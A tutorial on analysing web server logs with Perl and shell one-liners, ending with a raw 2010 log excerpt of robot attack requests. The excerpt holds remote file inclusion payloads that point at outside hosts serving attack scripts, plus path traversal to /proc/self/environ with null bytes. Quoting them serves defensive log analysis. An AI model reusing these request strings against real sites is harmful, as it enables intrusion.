Perl was designed for processing text, and this is the particular task where it shines. No other scripting language generally comes close.
Simple analysis of HTTP server logs can be done using just Perl (or another scripting language) and pipes. Very useful reports can be generated this way. But the problem is that web server logs are now polluted, and it is not easy to distinguish legitimate requests that failed with code 404 (page not found) from the bogus requests generated by the army of zombies accessing the website day and night. See Requests for non-existing web pages. That makes traditional log analyzers like AWStats much less useful. The only thing the 404 section of AWStats tells you, when fed raw logs, is the level of zombie activity, not which pages or images might actually be missing. So before you apply AWStats to your logs they need to be pre-filtered with a custom Perl script. This is impossible to do if you are using a cheap web hosting provider, so the problem is real and painful.
The same is true for successful hits. I have seen many cases when a particular page suddenly jumps into the top ten in popularity, and it turns out that this is due to some script retrieving it in a loop. Sometimes it is not even the whole page, just the header.
Generally, approximately 6% of the total IP address space seen in the logs consists of malignant users. For example, if the total size of the IP address space hitting your site is 100K addresses, then approximately 6K of them are malignant users and robots. It is clearly impossible to block all of them using simple methods. But you can and should deny access to the top abusers, say a dozen addresses in each category of malignant access. Of course those IP sets overlap, as many robots are engaged in several types of malignant activity.
Generally, for a more or less popular web site, malignant robots distort web statistics so significantly that without filtering them out, any judgment about which pages of your site are popular (to say nothing of more complex questions) is suspect. Usually the pages that look popular without filtering are the result of the activity of referrer spammers or bangers. I have seen cases when a page was accessed tens of thousands of times a day and all accesses were "fake" -- supposedly coming from some undebugged robot, or serving as the target of some "is alive" type of script.
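To make the point concrete, here is a minimal sketch of such a pre-filter (the blacklist file name and the libwww-perl pattern are assumptions made for the example; a real filter would use your own list of offenders and patterns):

#!/usr/bin/perl -w
# prefilter.pl -- pass through only the log lines worth feeding to AWStats
use strict;

my %bad_ip;
if (open my $bl, '<', 'blacklist.txt') {        # one offending IP per line (file name is an assumption)
    while (<$bl>) { chomp; $bad_ip{$_} = 1 if $_; }
    close $bl;
}

while (my $line = <>) {
    my ($ip) = $line =~ /^(\S+)/;               # first field of a common/combined record is the remote host
    next if defined $ip and $bad_ip{$ip};       # drop blacklisted addresses
    next if $line =~ /libwww-perl/i;            # drop the most common "blind probe" user agent
    print $line;
}

Typical use: perl prefilter.pl access_log > access_log.clean, and then feed access_log.clean to AWStats.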
Most web servers store their access log in what is called the "common log format." Each time a user requests a file from the server, a line containing the following fields is added to the end of the log file:
- The IP address of the remote host that made the request (for example, 10.1.1.1). Very rarely this is a resolved DNS name of the remote host requesting the page. For performance reasons, most web servers are configured not to do hostname lookups on the remote host. This means that all you end up with in the log file is a bunch of IP addresses. But it's not difficult to convert them into DNS names, if necessary, for "interesting" subsets of the log when you start analyzing them.
- The identd user name and the authenticated user name. Both are usually unavailable and logged as a dash (-).
- The date, time, and time zone of the request, in square brackets.
- The request line, in double quotes: "GET / HTTP/1.0". The GET part means it is a GET request (as opposed to a POST or a HEAD request). The next part is the path of the URL requested; in this case, the default page in the server's top-level directory, as indicated by a single slash (/). The last part of the request is the protocol being used, at the time of this writing typically HTTP/1.0 or HTTP/1.1.
- The HTTP status code: 200 means everything was handled okay, 304 means the document has not changed since the client last requested it, 404 means the document could not be found, and 500 indicates that there was some sort of server-side error. (RFC 1945 contains more. See http://www.w3.org/Protocols/rfc1945/rfc1945.)
- The number of bytes transferred.
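When you do want names for an "interesting" subset (say, your top visitors), a reverse lookup takes only a few lines of Perl. This is a minimal sketch, not part of the original text, using the standard Socket module:

#!/usr/bin/perl -w
# Read IP addresses, one per line, and print "ip  name" pairs.
# Reverse lookups are slow, so do this only for a small, interesting subset of the log.
use strict;
use Socket;

while (my $ip = <>) {
    chomp $ip;
    next unless $ip =~ /^\d+\.\d+\.\d+\.\d+$/;
    my $name = gethostbyaddr(inet_aton($ip), AF_INET);
    printf "%-15s %s\n", $ip, defined $name ? $name : "(no PTR record)";
}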
An extended version of this log format, often referred to as the "combined" format, includes two additional fields at the end: the referring URL and the user agent (the browser or robot that made the request).
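For example (the host, request, and referrer below are made up purely to show the field layout), a combined-format record looks like this:

10.1.1.1 - - [16/Aug/2010:06:51:08 -0600] "GET /index.shtml HTTP/1.1" 200 2326 "http://www.example.com/links.html" "Mozilla/5.0 (compatible; ExampleBot/1.0)"

The last two quoted fields are exactly what you need for spotting referrer spammers and for filtering robots such as the libwww-perl probes shown later in this page.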
Here is a very simple example of finding the most visited sites using pipes:
gzip -dc $1.gz | grep '" 200' | cut -d '"' -f 2 | cut -d '/' -f 3 | tr '[:upper:]' '[:lower:]' | sort | uniq -c | sort -rn > most_frequent
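The same report can be produced in Perl alone. This is an illustrative equivalent of the pipe above (assuming, as the pipe does, proxy-style logs with absolute URLs in the request field), not part of the original tip set:

gzip -dc access_log.gz | perl -ne '
    next unless /" 200 /;                            # successful requests only
    my ($req) = /"([^"]*)"/ or next;                 # the quoted request field
    my $site  = (split m{/}, $req)[2] or next;       # host part of an absolute URL
    $count{lc $site}++;
    END { printf "%7d %s\n", $count{$_}, $_ for sort { $count{$b} <=> $count{$a} } keys %count }
' > most_frequent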
Note: Most tips were borrowed from ktmatu - One-liners by Matti Tukiainen. Some are modified. We assume that the web server log files (access_log*) are in Combined Format.
less has the option -S (or --chop-long-lines), which causes lines longer than the screen width to be chopped rather than folded. That is, the portion of a long line that does not fit in the screen width is not shown. The default is to fold long lines, i.e. to display the remainder on the next line.
less -S access_log
Count successful (status 200) requests:
grep -c '" 200 ' access_log

Count requests excluding images in a compressed log (sample output: 2569):
gzip -dc access_log.gz | egrep -vc '(\.gif |\.jpg |\.png )'

Count today's hits (2569):
grep -c `date '+%d/%b/%Y'` access_log

Count today's unique visitors, i.e. distinct remote hosts (1196):
grep `date '+%d/%b/%Y'` access_log | cut -d" " -f1 | sort -u | wc -l

Count the hits for a given date, in a plain or a compressed log (2569):
grep -c 01/Jan/2001 access_log
gzip -dc access_log.gz | grep -c 01/Jan/2001

Show the first and the last entry of the log:
head -1 access_log; tail -1 access_log
foo.example - - [30/Dec/2000:23:55:25 +0200] "GET /~ktmatu/ ...
bar.example - - [06/Jan/2001:23:53:37 +0200] "GET /~ktmatu/rates.html ...

The same for a compressed log:
gzip -dc access_log.gz | head -1 ; gzip -dc access_log.gz | tail -1

List the days covered by the log (plain and compressed):
cut -d" " -f4 access_log | cut -d"/" -f1 | uniq
gzip -dc wlog0101.gz | cut -d" " -f4 | cut -d"/" -f1 | uniq
[30 [31 [01 [03 [04 [05 [06
This is just a very quick and dirty way to check the log.
Count malformed lines (a well-formed combined-format line splits into exactly 7 pieces on the double quote); sample output: 7
perl -ane 'print $_ if (scalar (split /\"/)) != 7' access_log | wc -l
gzip -dc access_log.gz | perl -ane 'print $_ if (scalar (split /\"/)) != 7' | wc -l

Show a given line of the log by number (grep -n prefixes every line with its number):
grep -n '.*' access_log | grep '^15927\:'
15927:foo.example.com - - [20/Jan/2002:11:23:45 +0200] "GET ...

Show a range of lines (15920-15929):
grep -n '.*' access_log | grep '^1592.\:'
15920:foo.example.com - - [20/Jan/2002:11:23:40 +0200] "GET ...
15921:foo.example.com - - [20/Jan/2002:11:23:41 +0200] "GET ...
15922:foo.example.com - - [20/Jan/2002:11:23:41 +0200] "GET ...
...

The same for a compressed log:
gzip -dc access_log.gz | grep -n '.*' | grep '^15927\:'
gzip -dc access_log.gz | grep -n '.*' | grep '^1592.\:'

Sum the bytes transferred today (field 10 of each record; sample output: 13113756):
grep `date '+%d/%b/%Y'` access_log | awk '{ s += $10 } END {print s}'

Bytes transferred during the current month (569477018):
grep `date '+../%b/%Y'` access_log | awk '{ s += $10 } END {print s}'

Bytes sent to googlebot (29832233):
grep googlebot access_log | awk '{ s += $10 } END {print s}'

Bytes sent to a particular IP address (46760880):
grep ^169.254.22.12 access_log | awk '{ s += $10 } END {print s}'
Partial content requests (status 206) are usually generated by download managers to speed up the downloading of big files, and by Adobe Acrobat Reader fetching PDF documents page by page. In this example, 206 requests generated by Acrobat Reader are deleted so that they don't inflate the hit count.
grep -v '\.pdf .* 206 ' access_log > new_log
Extract all entries for May 2009 and archive them compressed (gzip or bzip2):
grep ' \[../May/2009\:' access_log | gzip -9c > access_log-2009-05.gz
grep ' \[../May/2009\:' access_log | bzip2 > access_log-2009-05.bz2
Watch new entries as they are appended to the log:
tail -f access_log
Browse the whole log interactively:
less access_log
Recently the number of "strange" access records in web logs jumped up, and it became interesting to analyze the logs and see what those "strange" users are doing. Here is one fragment that I found in 2010:
85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /Admin/Tivoli/TMF/Gateways/gateway_troubleshooting.shtml%20/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 820 "-" "libwww-perl/5.831" 85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831" 85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.progene.info/English/bodo.txt??? HTTP/1.1" 302 820 "-" "libwww-perl/5.831" 85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831" 85.92.68.99 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?shop_this_skin_path=http://www.progene.info/English/bodo.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831" 67.223.224.130 - - [16/Aug/2010:07:14:51 -0600] "GET //phpAdsNew/view.inc.php?phpAds_path=http://www.growthinstitute.in/magazine/content/db.txt?? HTTP/1.1" 302 824 "-" "libwww-perl/5.831" 67.223.224.130 - - [16/Aug/2010:07:14:52 -0600] "GET /400.shtml?phpAds_path=http://www.growthinstitute.in/magazine/content/db.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831" 77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:39 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 77.243.239.121 - - [16/Aug/2010:07:41:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:37 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:38 -0600] "GET 
/400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:38 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:39 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:39 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805" 85.236.38.205 - - [16/Aug/2010:07:42:40 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 89.111.176.226 - - [16/Aug/2010:07:43:47 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:48 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:48 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:49 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:49 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.810" 89.111.176.226 - - [16/Aug/2010:07:43:50 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.810" 125.164.72.146 - - [16/Aug/2010:07:48:59 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? 
HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:00 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:01 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:02 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:02 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:03 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:03 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:04 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:04 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:05 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:05 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:06 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? 
HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:06 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:07 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:07 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:08 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:09 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:10 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:19 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:20 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:21 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:23 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:23 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:40 -0600] "GET /Copyright/Bulletin/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? 
HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:41 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:42 -0600] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:43 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:44 -0600] "GET /Copyright/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt? HTTP/1.1" 302 1004 "-" "libwww-perl/5.808" 125.164.72.146 - - [16/Aug/2010:07:49:45 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=http://tubiwityu.fileave.com/casper/raw.txt%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.808" 91.121.1.124 - - [16/Aug/2010:07:52:17 -0600] "GET /Copyright/Bulletin//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:21 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:21 -0600] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /Copyright//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.803" 91.121.1.124 - - [16/Aug/2010:07:52:22 -0600] "GET /400.shtml?_REQUEST=&_REQUEST%255boption%255d=com_content&_REQUEST%255bItemid%255d=1&GLOBALS=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.803" 62.193.242.164 - - [16/Aug/2010:08:03:41 -0600] "GET /Social/Toxic_managers/Micromanagers/fighting_micromanagers.shtml HTTP/1.1" 500 811 "-" "libwww-perl/5.813" 62.193.242.164 - - [16/Aug/2010:08:03:43 -0600] "GET /Social/Toxic_managers/Micromanagers/fighting_micromanagers.shtml HTTP/1.1" 500 811 "-" "libwww-perl/5.813" 209.190.190.5 - - [16/Aug/2010:08:08:36 -0600] "GET /Tools/tr.shtml HTTP/1.0" 500 761 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14FM SSL-MM/1.4.1 OpenSSL/0.9.7d-dev" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET 
/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /DB/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /DB/index.shtml/images/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 302 786 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 186.28.232.13 - - [16/Aug/2010:08:55:46 -0600] "GET /400.shtml?error=http://jspo.org/images/gallery/id.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.805" 222.122.13.12 - - [16/Aug/2010:08:57:05 -0600] "GET /Scripting/php.shtml/errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:05 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /errors.php?error=http://daviz.fileave.com/ID-RFI.txt?? HTTP/1.1" 302 776 "-" "libwww-perl/5.79" 222.122.13.12 - - [16/Aug/2010:08:57:06 -0600] "GET /400.shtml?error=http://daviz.fileave.com/ID-RFI.txt%3f%3f HTTP/1.1" 500 756 